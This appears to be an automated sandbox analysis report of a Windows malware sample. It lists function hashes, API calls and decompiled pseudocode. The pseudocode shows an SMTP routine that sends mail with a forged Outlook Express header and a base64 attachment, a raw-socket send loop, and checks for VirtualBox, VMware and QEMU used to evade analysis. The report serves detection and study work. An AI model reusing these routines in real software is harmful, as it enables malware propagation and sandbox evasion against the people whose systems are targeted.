RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047AF
RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047EA
RegCloseKey.ADVAPI32 ref: 004047FA

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID:
API String ID: 3546245721-0
Opcode ID: 958a2e4ef0ba8bedcf82df9d746db21d8d07d340abbef20f900d82c39de117dd
Instruction ID: 6ed68635854e72cbad61cdb7226dc2d583aa3803ebbc72776a4c5814d6946410
Opcode Fuzzy Hash: 958a2e4ef0ba8bedcf82df9d746db21d8d07d340abbef20f900d82c39de117dd
Instruction Fuzzy Hash: 962179B49043099FD700EF69D58579EBBF4BB48354F40896EE89897341E378D648CB52

Uniqueness

Uniqueness Score: -1.00%

Function 004049EA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00404748: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,00404A84), ref: 00404781
Part of subcall function 00404748: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047AF
Part of subcall function 00404748: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047EA
Part of subcall function 00404748: RegCloseKey.ADVAPI32 ref: 004047FA

CharLowerA.USER32 ref: 00404A8B

Part of subcall function 00404990: strstr.MSVCRT ref: 004049C7

Strings

SYSTEM\ControlSet001\Services\Disk\Enum, xrefs: 004049F5
012, xrefs: 00404A45

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Open$CharCloseLowerQueryValuestrstr
String ID: 012$SYSTEM\ControlSet001\Services\Disk\Enum
API String ID: 2399448135-1634863437
Opcode ID: 78eebafeba9169b15c599dbb74883321dd13a7f0e7c19f3bc8d5233c6d672bb7
Instruction ID: 870a1de997922802b68f1717d84fe3bed6c75bca7598e79a585ce558600d9c18
Opcode Fuzzy Hash: 78eebafeba9169b15c599dbb74883321dd13a7f0e7c19f3bc8d5233c6d672bb7
Instruction Fuzzy Hash: 7221A6B4904218DFCB60DF68EA8069DBBF4EB48314F50413AE958F7750D33499498F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00404059
GetLastError.KERNEL32 ref: 00404061

Strings

k_fbpxf5nna, xrefs: 00404033

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: CreateErrorLastMutex
String ID: k_fbpxf5nna
API String ID: 1925916568-3032876681
Opcode ID: 6f95fa231079c09e396f6b0f54b5f8dbb5f77dcec0ad5495da8417b03df94277
Instruction ID: b44495afc4b5e1c155c3d7f26a4bf6281c5b98a28f183e2cb1f81a9367dbc24a
Opcode Fuzzy Hash: 6f95fa231079c09e396f6b0f54b5f8dbb5f77dcec0ad5495da8417b03df94277
Instruction Fuzzy Hash: 17E04FB0418308DAC700BF71C1C664DBEE4AB80348F40893EE888622C2C778958C8727

Uniqueness

Uniqueness Score: -1.00%

Function 00403E2E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00403E5B
GetLastError.KERNEL32 ref: 00403E63

Strings

IHYanFuibyan, xrefs: 00403E35

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: CreateErrorLastMutex
String ID: IHYanFuibyan
API String ID: 1925916568-2233043627
Opcode ID: 90a2e3c8c183a3a040ff48c78d001bcb7690f83f18904d60cf146c94564bbd81
Instruction ID: b226eb3715ba9fc3d7238d88576273fb4163caaa6f42e8cd02b01324a8811274
Opcode Fuzzy Hash: 90a2e3c8c183a3a040ff48c78d001bcb7690f83f18904d60cf146c94564bbd81
Instruction Fuzzy Hash: 30E04FB0408308DACB00BF71C1C564DBEE4AB40388F40853EE888622C2C778954C8727

Uniqueness

Uniqueness Score: -1.00%

Function 004081D8 Relevance: 4.5, APIs: 3, Instructions: 48fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32 ref: 00408202
ReadFile.KERNEL32 ref: 00408240
SetFilePointer.KERNEL32 ref: 0040828A

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: File$Pointer$Read
String ID:
API String ID: 2010065189-0
Opcode ID: 98bbd356c3167e2cab6cdd34103aca9027d91ebdbeeba2350e71e45c4cb0b634
Instruction ID: 2fc028183e425e45779f901a37d6f7d52457d7c17fe6e1465a33136023a7a73b
Opcode Fuzzy Hash: 98bbd356c3167e2cab6cdd34103aca9027d91ebdbeeba2350e71e45c4cb0b634
Instruction Fuzzy Hash: 69111FF04083049FD710AF15C9843AFBBF4EB84354F00C8AEE98867281D7798589CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00405434 Relevance: 4.5, APIs: 3, Instructions: 44
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405434(signed int __eax, void* __ebx, signed int _a4, signed short _a8) {
				void* _v8;
				intOrPtr _v24;
				signed int _v26;
				char _v28;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _t21;
				intOrPtr _t23;
				signed int _t24;
				signed int _t26;
				void* _t29;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;

				_t30 = _t29 - 0x34;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 6;
				_v56 = 1;
				 *_t30 = 2; // executed
				L004086F0(); // executed
				_t31 = _t30 - 0x18;
				_t26 = __eax;
				_t28 = 0xffffffff;
				if(__eax != 0xffffffff) {
					_t21 = _a8 & 0x0000ffff;
					_v84 = _t21;
					L004086F8();
					_t32 = _t31 - 4;
					_v26 = _t21;
					_v28 = 2;
					 *_t32 = _a4; // executed
					_t23 = E004053C2(_a4, 0xffffffff); // executed
					_v24 = _t23;
					_v64 = 0;
					_v68 = 0;
					_v72 = 0;
					_v76 = 0;
					_v80 = 0x10;
					_t24 =  &_v28;
					_v84 = _t24;
					 *_t32 = _t26; // executed
					L00408700(); // executed
					_t28 = 0xffffffff;
					if(_t24 != 0xffffffff) {
						_t28 = _t26;
					}
				}
				return _t28;
			}

0x00405438
0x0040543b
0x00405443
0x0040544b
0x00405453
0x0040545b
0x00405463
0x0040546a
0x0040546f
0x00405472
0x00405474
0x0040547c
0x0040547e
0x00405482
0x00405485
0x0040548a
0x0040548d
0x00405491
0x0040549a
0x0040549d
0x004054a2
0x004054a5
0x004054ad
0x004054b5
0x004054bd
0x004054c5
0x004054cd
0x004054d0
0x004054d4
0x004054d7
0x004054df
0x004054e7
0x004054e9
0x004054e9
0x004054e7
0x004054f1

APIs

WSASocketA.WS2_32 ref: 0040546A
htons.WS2_32 ref: 00405485

Part of subcall function 004053C2: gethostbyname.WS2_32(00000000), ref: 004053D7
Part of subcall function 004053C2: inet_addr.WS2_32 ref: 004053E8
Part of subcall function 004053C2: memcpy.MSVCRT ref: 00405423

WSAConnect.WS2_32 ref: 004054D7

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: ConnectSocketgethostbynamehtonsinet_addrmemcpy
String ID:
API String ID: 627762279-0
Opcode ID: cbeef7b113f09878ddbc90929fe5aaae046d80e49792cd390fc9edf2445fe666
Instruction ID: 4ae3107c3b65c64df90930ed9eb0b1ead9faca9bbcd06d8d2a5bcce3cf5a65bf
Opcode Fuzzy Hash: cbeef7b113f09878ddbc90929fe5aaae046d80e49792cd390fc9edf2445fe666
Instruction Fuzzy Hash: ED1118B05047059BD700EF69C58935FBBF0AF44328F108A2DE4A89B3D2E7B9C5498B97

Uniqueness

Uniqueness Score: -1.00%

Function 004053C2 Relevance: 4.5, APIs: 3, Instructions: 41networkCOMMON

Download Yara Rule

APIs

gethostbyname.WS2_32(00000000), ref: 004053D7
inet_addr.WS2_32 ref: 004053E8
memcpy.MSVCRT ref: 00405423

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: gethostbynameinet_addrmemcpy
String ID:
API String ID: 1740921095-0
Opcode ID: fe788954808ae36a3766fbf6f3cc5b4fd8bb7ec2d21b63c4e00761cad23c0ede
Instruction ID: 533992feeedd80a0f3e016846fddd558e4e21ba974aaa263bb38accae91cd44b
Opcode Fuzzy Hash: fe788954808ae36a3766fbf6f3cc5b4fd8bb7ec2d21b63c4e00761cad23c0ede
Instruction Fuzzy Hash: 60017875904B049BDB00AFA9D18129FBBB4EF04360F00857EEC94A7380E7389644CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED6 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00404EEA
fclose.MSVCRT ref: 00404EFB

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: fclosefopen
String ID:
API String ID: 1280645193-0
Opcode ID: c0597ab26c6aa1b78a6ebbb00da8a547106f8da08274bd1923c6da324a404cdd
Instruction ID: 620b73777646bea3160a61964eb414d400b49bbe5014070f778a9d056a582589
Opcode Fuzzy Hash: c0597ab26c6aa1b78a6ebbb00da8a547106f8da08274bd1923c6da324a404cdd
Instruction Fuzzy Hash: 69D05E74204300D7E7007F79988530A7AD49B80308F00883DA980EF3C6EA79D8448B45

Uniqueness

Uniqueness Score: -1.00%

Function 00401280 Relevance: 3.0, APIs: 2, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E00401280() {
				void* _t4;
				intOrPtr* _t5;
				intOrPtr* _t8;

				 *_t8 = 1;
				 *0x41949c();
				E00401150();
				_t5 = _t8;
				 *((intOrPtr*)(_t8 - 8)) = 2;
				 *0x41949c(_t4); // executed
				E00401150(); // executed
				_push(_t5);
				goto __ecx;
			}

0x00401286
0x0040128d
0x00401293
0x004012a1
0x004012a6
0x004012ad
0x004012b3
0x004012c0
0x004012ca

APIs

__set_app_type.MSVCRT ref: 0040128D

Part of subcall function 00401150: SetUnhandledExceptionFilter.KERNEL32 ref: 0040115E
Part of subcall function 00401150: __getmainargs.MSVCRT ref: 0040119E
Part of subcall function 00401150: _setmode.MSVCRT ref: 004011D8
Part of subcall function 00401150: _setmode.MSVCRT ref: 004011FC
Part of subcall function 00401150: __p__fmode.MSVCRT ref: 00401210
Part of subcall function 00401150: __p__environ.MSVCRT ref: 0040122A
Part of subcall function 00401150: _cexit.MSVCRT ref: 0040124D
Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401255
Part of subcall function 00401150: _setmode.MSVCRT ref: 0040126F

__set_app_type.MSVCRT ref: 004012AD

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: _setmode$__set_app_type$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
String ID:
API String ID: 2043081007-0
Opcode ID: 36b1d3dea03947f55434b9ec7bd84f55484cfed7e86ffaa1a5bdde0d5196f56c
Instruction ID: 752eb1ab21b4c19d55682f3c7b2bcf3a34383202cb890f95c9a90ba33a14ec6c
Opcode Fuzzy Hash: 36b1d3dea03947f55434b9ec7bd84f55484cfed7e86ffaa1a5bdde0d5196f56c
Instruction Fuzzy Hash: 02D09B354142149BC7007BF5DC0A399BBA86B09301F41443CE6CD67261D6743C4947DA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406BEA Relevance: 18.1, APIs: 12, Instructions: 148memorysleepnetworkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00406C3F
WSASocketA.WS2_32 ref: 00406C79
setsockopt.WS2_32 ref: 00406CB7
GetProcessHeap.KERNEL32 ref: 00406CD0
RtlAllocateHeap.NTDLL ref: 00406CE8
memset.MSVCRT ref: 00406D1E
GetCurrentProcessId.KERNEL32 ref: 00406D2B
GetTickCount.KERNEL32 ref: 00406D52
Sleep.KERNEL32 ref: 00406D8E
GetTickCount.KERNEL32 ref: 00406DA3
sendto.WS2_32 ref: 00406DEF
Sleep.KERNEL32 ref: 00406E06

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: CountHeapProcessSleepTick$AllocateCurrentSocketinet_addrmemsetsendtosetsockopt
String ID:
API String ID: 3025670439-0
Opcode ID: aab9db7d1f6547efff39c5e7e4416d57ca9136db26d487827e21e78aeb388619
Instruction ID: c887a22924d357f2cc4e5641eb84b294b57a756f528ba2f64bcdc76ce2e57ac6
Opcode Fuzzy Hash: aab9db7d1f6547efff39c5e7e4416d57ca9136db26d487827e21e78aeb388619
Instruction Fuzzy Hash: EB5129B09043459BD700EFA8C18439EFBF1BF84314F108A3EE499AB785D7789459CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00404990 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 28stringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 004049C7

Strings

vbox, xrefs: 004049B0
vmware, xrefs: 004049A2
qemu, xrefs: 004049A9
virtual, xrefs: 0040499B

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: strstr
String ID: qemu$vbox$virtual$vmware
API String ID: 1392478783-2646423876
Opcode ID: e80c964a466ab43288035c18f3b9686e1997324c0e45a20cd33772183577bb06
Instruction ID: b540962fa618101e36228a8a74583da539d79dad1ba2731ad5b1d3bf9ece319c
Opcode Fuzzy Hash: e80c964a466ab43288035c18f3b9686e1997324c0e45a20cd33772183577bb06
Instruction Fuzzy Hash: 3DF0A7F4800208CBDB109FA5D8813AF7BA8EB04718F10407ADA54BF7C0D3799D8487D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040619A Relevance: 100.1, APIs: 24, Strings: 33, Instructions: 328
networkstringtimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040619A(void* __edx, CHAR* _a4, intOrPtr _a8, intOrPtr _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _v16;
				intOrPtr _v40;
				int _v42;
				char _v44;
				void _v1068;
				char _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				void _v1228;
				struct _SYSTEMTIME _v1244;
				int _v1248;
				void* _v1252;
				intOrPtr _v1256;
				void* _v1260;
				intOrPtr _v1264;
				void* _v1268;
				CHAR* _v1272;
				CHAR* _v1276;
				void* _v1280;
				signed int _v1284;
				signed int _v1288;
				intOrPtr _v1292;
				signed int _v1296;
				char _v1300;
				void* _v1304;
				intOrPtr _v1308;
				CHAR* _v1312;
				char _v1316;
				CHAR* _v1320;
				CHAR* _v1324;
				CHAR* _v1328;
				void* __ebx;
				int _t137;
				int _t138;
				char _t139;
				char* _t140;
				CHAR* _t166;
				void* _t193;
				CHAR* _t195;
				CHAR* _t200;
				CHAR* _t202;
				void* _t203;
				void* _t208;
				void* _t209;
				CHAR* _t215;
				void* _t216;
				void* _t217;
				CHAR** _t222;
				CHAR** _t226;

				_t208 = __edx;
				memset( &_v1068, 0, 0x400);
				_t209 =  &_v1132;
				asm("cld");
				memset(_t209, 0, 0xc << 2);
				 *((short*)(_t209 + 0xc)) = 0;
				_v1164 = 0x412620;
				_v1160 = 0x412624;
				_v1156 = 0x412628;
				_v1152 = 0x41262c;
				_v1148 = 0x412630;
				_v1144 = 0x412634;
				_v1140 = 0x412638;
				_v1136 = 0x41263c;
				memcpy( &_v1228, 0x40d424, 0xd << 2);
				GetSystemTime( &_v1244);
				_v1276 = _v1244.wSecond & 0x0000ffff;
				_v1280 = _v1244.wMinute & 0x0000ffff;
				_v1284 = _v1244.wHour & 0x0000ffff;
				_v1288 = _v1244.wYear & 0x0000ffff;
				_v1292 =  *((intOrPtr*)(_t216 + (_v1244.wMonth & 0x0000ffff) * 4 - 0x4c8));
				_v1296 = _v1244.wDay & 0x0000ffff;
				_v1300 =  *((intOrPtr*)(_t216 + (_v1244.wDayOfWeek & 0x0000ffff) * 4 - 0x488));
				_t137 = wsprintfA( &_v1132, "%s, %d %s %d %d:%d:%d GMT");
				_v1292 = 6;
				_v1296 = 1;
				_v1300 = 2;
				L00408708();
				_t222 = _t217 - 0x50c + 0x18 - 0xfffffffffffffff8;
				_t215 = _t137;
				if(_t137 == 0xffffffff) {
					L39:
					_v1312 = _t215;
					L004086C0();
					_t138 = 0;
				} else {
					_v44 = 2;
					_v1312 = 0x19;
					L004086F8();
					_v42 = _t137;
					_t139 = _a4;
					_v1316 = _t139;
					L004086E8();
					_t226 = _t222;
					_v40 = _t139;
					if(_t139 != 0xffffffff) {
						L4:
						_v1312 = 0x10;
						_t140 =  &_v44;
						_v1316 = _t140;
						_v1320 = _t215;
						L00408710();
						_t222 = _t226 - 0xc;
						if(_t140 == 0xffffffff) {
							goto L39;
						} else {
							 *_t222 = _t215;
							if(E004067E0(0) == 0) {
								goto L39;
							} else {
								_v1324 = _a4;
								_v1328 = "HELO %s\r\n";
								_t200 =  &_v1068;
								 *_t222 = _t200;
								if(E00406788(wsprintfA(??, ??), _t215, _t200) == 0) {
									goto L39;
								} else {
									_v1316 = _a8;
									if(E00406788(wsprintfA(_t200, "MAIL FROM: <%s>\r\n"), _t215, _t200) == 0) {
										goto L39;
									} else {
										_v1308 = _a12;
										if(E00406788(wsprintfA(_t200, "RCPT TO: <%s>\r\n"), _t215, _t200) == 0 || E00406788(_t150, _t215, "DATA\r\n") == 0) {
											goto L39;
										} else {
											_v1300 = _a8;
											if(E00406746(wsprintfA(_t200, "FROM: <%s>\r\n"), _t200, _t215, _t200) == 0) {
												goto L39;
											} else {
												_v1292 = _a12;
												if(E00406746(wsprintfA(_t200, "TO: <%s>\r\n"), _t200, _t215, _t200) == 0) {
													goto L39;
												} else {
													_v1284 =  &_v1132;
													if(E00406746(wsprintfA(_t200, "Date: %s\r\n"), _t200, _t215, _t200) == 0 || E00406746(_t160, _t200, _t215, "MIME-Version: 1.0\r\n") == 0) {
														goto L39;
													} else {
														_v1276 = _a16;
														if(E00406746(wsprintfA(_t200, "Subject: %s\r\n"), _t200, _t215, _t200) == 0 || E00406746(_t164, _t200, _t215, "X-Mailer: Microsoft Outlook Express 6.00.2800.1106\r\n") == 0) {
															goto L39;
														} else {
															_t166 = _a24;
															_v1276 = _t166;
															L0040C310();
															_t222 = _t222 - 4;
															if(_t166 == 0) {
																if(E00406746(_t166, _t200, _t215, "Content-type: text/plain; charset=ISO-8859-1\r\n") == 0 || E00406746(_t167, _t200, _t215, "Content-Transfer-Encoding: 8bit\r\n") == 0) {
																	goto L39;
																} else {
																	_v1272 = _a20;
																	_v1276 = "\r\n%s\r\n";
																	_v1280 =  &_v1068;
																	if(E00406746(wsprintfA(??, ??),  &_v1068, _t215,  &_v1068) == 0) {
																		goto L39;
																	} else {
																		goto L36;
																	}
																}
															} else {
																if(E00406746(_t166, _t200, _t215, "Content-type: Multipart/Mixed; boundary=xContext\r\n") == 0 || E00406746(_t174, _t200, _t215, "\r\n--xContext\r\n") == 0) {
																	goto L39;
																} else {
																	if(_a32 == 0) {
																		if(E00406746(_t175, _t200, _t215, "Content-type: text/plain; charset=ISO-8859-1\r\n") == 0) {
																			goto L39;
																		} else {
																			goto L23;
																		}
																	} else {
																		if(E00406746(_t175, _t200, _t215, "Content-type: text/plain; charset=Windows-1251\r\n") == 0) {
																			goto L39;
																		} else {
																			L23:
																			if(E00406746(_t176, _t200, _t215, "Content-Transfer-Encoding: 8bit\r\n") == 0) {
																				goto L39;
																			} else {
																				_v1272 = _a20;
																				_v1276 = "\r\n%s\r\n";
																				_t202 =  &_v1068;
																				_v1280 = _t202;
																				if(E00406746(wsprintfA(??, ??), _t202, _t215, _t202) == 0 || E00406746(_t180, _t202, _t215, "\r\n--xContext\r\n") == 0) {
																					goto L39;
																				} else {
																					_v1264 = _a28;
																					if(E00406746(wsprintfA(_t202, "Content-type: Application/Octet-stream; name=\"%s\"; type:unknown\r\n"), _t202, _t215, _t202) == 0) {
																						goto L39;
																					} else {
																						_v1256 = _a28;
																						if(E00406746(wsprintfA(_t202, "Content-Disposition: attachment; filename=\"%s\"\r\n"), _t202, _t215, _t202) == 0 || E00406746(_t187, _t202, _t215, "Content-Transfer-Encoding: base64\r\n\r\n") == 0) {
																							goto L39;
																						} else {
																							_v1248 = 0;
																							_t203 = E004017F8(_t208, _a24,  &_v1248);
																							if(E00406746(_t191, _t203, _t215, _t191) != 0) {
																								_t193 = GlobalFree(_t203);
																								_t222 = _t222 - 4;
																								if(E00406746(_t193, _t203, _t215, "\r\n\r\n--xContext--\r\n") == 0) {
																									goto L39;
																								} else {
																									L36:
																									if(E00406788(_t171, _t215, "\r\n.\r\n") == 0 || E00406788(_t172, _t215, "QUIT\r\n") == 0) {
																										goto L39;
																									} else {
																										_v1272 = _t215;
																										L004086C0();
																										_t138 = 1;
																									}
																								}
																							} else {
																								GlobalFree(_t203);
																								_t222 = _t222 - 4;
																								goto L39;
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t195 = _a4;
						_v1320 = _t195;
						L004086D8();
						_t222 = _t226 - 4;
						if(_t195 == 0) {
							goto L39;
						} else {
							_v40 =  *((intOrPtr*)( *(_t195[0xc])));
							goto L4;
						}
					}
				}
				return _t138;
			}

APIs

memset.MSVCRT ref: 004061C4
GetSystemTime.KERNEL32 ref: 00406249
wsprintfA.USER32 ref: 004062BD
socket.WS2_32 ref: 004062D9
htons.WS2_32 ref: 004062F9
inet_addr.WS2_32 ref: 0040630B
gethostbyname.WS2_32 ref: 00406321
connect.WS2_32 ref: 0040634D
wsprintfA.USER32 ref: 00406386
wsprintfA.USER32 ref: 004063B1
wsprintfA.USER32 ref: 004063DC
wsprintfA.USER32 ref: 0040641F
wsprintfA.USER32 ref: 0040644A
wsprintfA.USER32 ref: 00406478
wsprintfA.USER32 ref: 004064BB
lstrlen.KERNEL32 ref: 004064F2
wsprintfA.USER32 ref: 0040659A
wsprintfA.USER32 ref: 004065DD
wsprintfA.USER32 ref: 00406608
GlobalFree.KERNEL32 ref: 0040666D
